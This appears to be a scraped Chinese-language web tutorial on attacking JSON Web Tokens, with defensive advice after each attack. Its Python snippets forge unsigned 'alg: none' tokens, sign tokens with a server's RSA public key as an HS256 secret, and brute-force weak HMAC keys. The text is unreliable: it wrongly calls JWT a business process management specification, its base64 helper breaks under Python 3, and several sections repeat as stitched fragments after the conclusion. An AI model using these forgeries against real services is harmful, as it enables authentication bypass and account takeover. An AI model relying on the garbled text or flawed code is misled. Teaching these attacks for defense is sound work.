JSON Web Token (JWT) 攻击技巧详解<\/h1>

1. JWT 概述<\/h2>
JSON Web Token (JWT) 是一种轻量级的业务流程管理规范，用于在用户和服务器之间安全可靠地传递信息。它通常用于实现前端和后端的解耦，并与 Restful API 一起构建身份验证机制。<\/p>

JWT 工作流程<\/h3>

用户提交凭证（如用户名\/密码）<\/li>
服务器验证凭证<\/li>
验证通过后，服务器返回包含 JWT 的响应<\/li>
后续请求中，客户端在 Authorization<\/code> 头中添加 JWT（格式为 Authorization: jwt <token><\/code>）<\/li>

JWT 通常存储在客户端的本地存储（LocalStorage）中<\/li>
<\/ol>
2. JWT 结构<\/h2>
JWT 由三部分组成，用点号(.)分隔：<\/p>

头部(Header)<\/li>
有效载荷(Payload)<\/li>
签名(Signature)<\/li>
<\/ul>
格式：base64UrlEncode(header).base64UrlEncode(payload).signature<\/code><\/p>
2.1 头部(Header)<\/h3>
包含 JWT 的配置信息，通常包括：<\/p>

alg<\/code>：签名算法（如 HS256、RS256）<\/li>
typ<\/code>：令牌类型（通常为 "JWT"）<\/li>
kid<\/code>：密钥 ID（当服务器使用多个密钥时）<\/li>
<\/ul>
示例解码后：<\/p>
{
<\/span><\/span>  "kid"<\/span>: "keys\/3c3c2ea1c3f113f649dc9389dd71b851"<\/span>,
<\/span><\/span>  "typ"<\/span>: "JWT"<\/span>,
<\/span><\/span>  "alg"<\/span>: "RS256"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 有效载荷(Payload)<\/h3>
包含用户数据（声明），如用户 ID、用户名等。<\/p>
示例解码后：<\/p>
{
<\/span><\/span>  "sub"<\/span>: "dubhe123"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 签名(Signature)<\/h3>
用于验证消息在传输过程中未被篡改。签名算法通常为：<\/p>

RS256（RSA 非对称加密，使用私钥签名，公钥验证）<\/li>
HS256（HMAC SHA256 对称加密，使用密钥签名和验证）<\/li>
<\/ul>
3. JWT 攻击技术<\/h2>
3.1 敏感信息泄露<\/h3>
由于有效载荷是 Base64 编码的明文，如果其中包含敏感信息（如密码、密钥等），攻击者可以直接解码获取这些信息。<\/p>
防御措施<\/strong>：不要在 JWT 中存储敏感信息。<\/p>
3.2 将签名算法改为 none<\/h3>
一些 JWT 库支持 none<\/code> 算法，即不进行签名验证。攻击步骤：<\/p>

修改头部中的 alg<\/code> 为 none<\/code><\/li>
删除签名部分（只保留 header.payload.<\/code>）<\/li>
提交给服务器<\/li>
<\/ol>
示例代码：<\/p>
import<\/span> base64
<\/span><\/span>
<\/span><\/span>def<\/span> b64urlencode<\/span>(data):
<\/span><\/span>    return<\/span> base64.<\/span>b64encode(data).<\/span>replace('+'<\/span>, '-'<\/span>).<\/span>replace('\/'<\/span>, '_'<\/span>).<\/span>replace('='<\/span>, ''<\/span>)
<\/span><\/span>
<\/span><\/span>print(b64urlencode('{"typ":"JWT","alg":"none"}'<\/span>) +<\/span> 
<\/span><\/span>      '.'<\/span> +<\/span> 
<\/span><\/span>      b64urlencode('{"data":"test"}'<\/span>) +<\/span> 
<\/span><\/span>      '.'<\/span>)
<\/span><\/span><\/code><\/pre>防御措施<\/strong>：禁用 none<\/code> 算法支持，或明确拒绝没有签名的 JWT。<\/p>
3.3 将 RS256 算法改为 HS256（非对称→对称）<\/h3>
攻击步骤：<\/p>

获取服务器的 RSA 公钥<\/li>
修改头部中的 alg<\/code> 从 RS256<\/code> 改为 HS256<\/code><\/li>
使用 RSA 公钥作为 HMAC 密钥对 JWT 进行签名<\/li>
服务器会使用公钥作为 HMAC 密钥来验证签名<\/li>
<\/ol>
示例代码：<\/p>
import<\/span> jwt
<\/span><\/span>
<\/span><\/span>public =<\/span> open('public.pem'<\/span>, 'r'<\/span>).<\/span>read()
<\/span><\/span>print(jwt.<\/span>encode({"data"<\/span>: "test"<\/span>}, key=<\/span>public, algorithm=<\/span>'HS256'<\/span>))
<\/span><\/span><\/code><\/pre>防御措施<\/strong>：<\/p>

在验证签名时强制使用预期的算法<\/li>
不要将公钥与对称算法混合使用<\/li>
<\/ul>
3.4 破解 HS256 密钥<\/h3>
如果 HS256 使用的密钥强度较弱，攻击者可以进行暴力破解。<\/p>
破解方法：<\/p>

收集有效的 JWT<\/li>
使用字典或暴力攻击尝试不同密钥<\/li>
当解码不抛出异常时，说明找到了正确密钥<\/li>
<\/ol>
示例代码：<\/p>
import<\/span> jwt
<\/span><\/span>
<\/span><\/span># 已知的有效 JWT 和解码后的内容<\/span>
<\/span><\/span>valid_jwt =<\/span> "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg"<\/span>
<\/span><\/span>known_payload =<\/span> {"some"<\/span>: "payload"<\/span>}
<\/span><\/span>
<\/span><\/span># 尝试破解密钥<\/span>
<\/span><\/span>possible_keys =<\/span> ["secret"<\/span>, "password"<\/span>, "123456"<\/span>, ...<\/span>]
<\/span><\/span>for<\/span> key in<\/span> possible_keys:
<\/span><\/span>    try<\/span>:
<\/span><\/span>        decoded =<\/span> jwt.<\/span>decode(valid_jwt, key, algorithms=<\/span>['HS256'<\/span>])
<\/span><\/span>        if<\/span> decoded ==<\/span> known_payload:
<\/span><\/span>            print(f<\/span>"Found key: <\/span>{<\/span>key}<\/span>"<\/span>)
<\/span><\/span>            break<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        continue<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/strong>：<\/p>

使用足够长且复杂的 HS256 密钥<\/li>
定期更换密钥<\/li>
考虑使用 RS256 等非对称算法替代 HS256<\/li>
<\/ul>
4. 防御建议<\/h2>

验证算法<\/strong>：在服务器端明确指定接受的算法，拒绝任何非预期的算法<\/li>
密钥管理<\/strong>：

对 HS256 使用强密钥<\/li>
对 RS256 妥善保管私钥<\/li>
<\/ul>
<\/li>
信息最小化<\/strong>：不要在 JWT 中存储敏感信息<\/li>
设置合理有效期<\/strong>：使用 exp<\/code> 声明设置短期有效的 JWT<\/li>
使用 HTTPS<\/strong>：防止 JWT 在传输过程中被窃取<\/li>
实施令牌撤销机制<\/strong>：对于敏感操作，提供令牌撤销能力<\/li>
<\/ol>
5. 参考工具<\/h2>

jwt.io<\/a> - JWT 调试和验证工具<\/li>
PyJWT - Python 的 JWT 库<\/li>
John the Ripper - 可用于暴力破解弱密钥<\/li>
jwt_tool<\/a> - 专门的 JWT 测试工具<\/li>
<\/ol>
6. 总结<\/h2>
JWT 作为一种广泛使用的身份验证机制，如果配置不当会带来严重的安全风险。安全人员应充分了解 JWT 的各种攻击技术，并在实现时采取相应的防御措施。特别要注意算法选择、密钥管理和信息保护等关键方面。<\/p>

JSON Web Token (JWT) 攻击技巧详解<\/h1>

1. JWT 概述<\/h2> JSON Web Token (JWT) 是一种轻量级的业务流程管理规范，用于在用户和服务器之间安全可靠地传递信息。它通常用于实现前端和后端的解耦，并与 Restful API 一起构建身份验证机制。<\/p>

3. JWT 攻击技术<\/h2>

3.1 敏感信息泄露<\/h3> 由于有效载荷是 Base64 编码的明文，如果其中包含敏感信息（如密码、密钥等），攻击者可以直接解码获取这些信息。<\/p> 防御措施<\/strong>：不要在 JWT 中存储敏感信息。<\/p>

1. JWT 概述<\/h2>
JSON Web Token (JWT) 是一种轻量级的业务流程管理规范，用于在用户和服务器之间安全可靠地传递信息。它通常用于实现前端和后端的解耦，并与 Restful API 一起构建身份验证机制。<\/p>

3.1 敏感信息泄露<\/h3>
由于有效载荷是 Base64 编码的明文，如果其中包含敏感信息（如密码、密钥等），攻击者可以直接解码获取这些信息。<\/p>
防御措施<\/strong>：不要在 JWT 中存储敏感信息。<\/p>